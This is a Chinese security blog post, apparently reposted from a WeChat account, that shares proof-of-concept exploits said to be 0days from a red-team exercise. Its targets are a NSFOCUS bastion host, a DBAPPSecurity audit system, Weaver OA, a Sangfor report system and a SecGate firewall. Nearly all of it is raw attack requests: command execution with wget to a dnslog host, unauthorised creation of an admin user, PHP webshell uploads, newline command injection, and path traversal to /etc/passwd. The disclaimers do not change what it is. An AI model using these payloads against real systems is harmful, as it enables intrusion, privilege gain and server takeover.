免责声明
月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
0x00前言
hvv第二弹
0x01漏洞一
绿盟 SAS堡垒机 Exec 远程命令执行漏洞
发现漏洞的路径的证明
require_once'Nsc/Websvc/Response.php';classExecControllerextendsCavy_Controller_Action{var$models ='no';publicfunctionindex(){$command =$this->_params['cmd'];$ret =0;$output =array();exec($command,$output,$ret);$result =newStdClass;if($ret !=0) {$result->code = Nsc_Websvc_Response::EXEC_ERROR;$result->text ="exec error";}else{$result->code = Nsc_Websvc_Response::SUCCESS;// $result->text = implode("n",$output);$result->text ="WEBSVC OK";}$this->_render(array('result'=>$result),'/websvc/result');}}
可发现在ExecController.php 文件中
poc:漏洞存在路径 /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx
GET /webconf/Exec/index?cmdwget 20bxbceb.dnslog.cn HTTP/1.1Host:Accept:*/*Content-Type:application/x-www-form-urlencoded
0x02漏洞二
安恒明御运维审计与风险控制系统xmlrpc.sock任意用户添加漏洞
POC:
POST/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpcHTTP/1.1Host:Cookie: LANG=zh; DBAPPUSM=ee4bbf6c85e541bb980ad4e0fbee2f57bb15bafe20a7028af9a0b8901cf80fd3Content-Length: 1117Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close<?xml version="1.0"?><methodCall><methodName>web.user_add</methodName><params><param><value><array><data><value><string>admin</string></value><value><string>5</string></value><value><string>10.0.0.1</string></value></data></array></value></param><param><value><struct><member><name>uname</name><value><string>test</string></value></member><member><name>name</name><value><string>test</string></value></member><member><name>pwd</name><value><string>1qaz@3edC12345</string></value></member><member><name>authmode</name><value><string>1</string></value></member><member><name>deptid</name><value><string></string></value></member><member><name>email</name><value><string></string></value></member><member><name>mobile</name><value><string></string></value></member><member><name>comment</name><value><string></string></value></member><member><name>roleid</name><value><string>102</string></value></member></struct></value></param></params></methodCall>
0x03漏洞三
泛微 OA 代码执行
POC:
POST/inc/jquery/uploadify/uploadify.phpHTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: testConnection: closeContent-Length: 493Accept-Encoding: gzipContent-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85Content-Disposition: form-data; name="Filedata"; filename="666.php"Content-Type: application/octet-stream<?php phpinfo();?>--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85----25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85Content-Disposition: form-data; name="file"; filename=""Content-Type: application/octet-stream--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
0x04漏洞四
深信服 sxf-报表系统
POC:
POST /rep/login HTTP/1.1Host: URLCookie:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2Accept-Encoding: gzip deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailersConnection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
GET/report/download.php?pdf=../../../../../etc/passwdHTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive
0x05漏洞五
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传
POC:
POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x.xAccept: */*Accept-Encoding: gzip, deflateContent-Length: 574Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="upfile"; filename="vulntest.php"Content-Type: text/plain<?php php马?>------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="__hash__"0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--
木马路径:attachements/xxx.php
目前护网已曝厂商漏洞,均为内部消息,欢迎大家一起来沟通护网消息
这是我们手上掌握的部分漏洞,还有更多漏洞将在后面曝光,关注月落安全,大佬带你飞。
手头没有几个0day也想混网安圈?苦苦寻找没有合适的技战法?护网值守时摸鱼无聊?
原文始发于微信公众号(月落安全):国护0day漏洞消息同步(Day2)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论